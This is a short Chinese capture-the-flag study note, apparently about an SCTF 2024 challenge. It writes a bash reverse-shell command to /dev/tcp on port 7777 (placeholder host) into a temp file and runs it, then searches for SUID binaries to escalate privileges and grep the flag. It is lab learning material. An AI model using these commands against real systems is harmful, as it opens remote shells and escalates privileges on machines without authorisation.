先写文件再加执行权限再执行,学到了
bash -c "bash -i >& /dev/tcp/xxx/7777 0>&1" > /tmp/aniale
chmod +x /tmp/aniale
bash /tmp/aniale
然后 suid 提权,grep 读 flag。
find / -perm -u=s -type f 2>/dev/null
剩下几道题有空再学
参考文章
https://natro92.fun/posts/4e67eb93/
https://blog.xmcve.com/2024/10/01/SCTF-2024-Writeup#title-19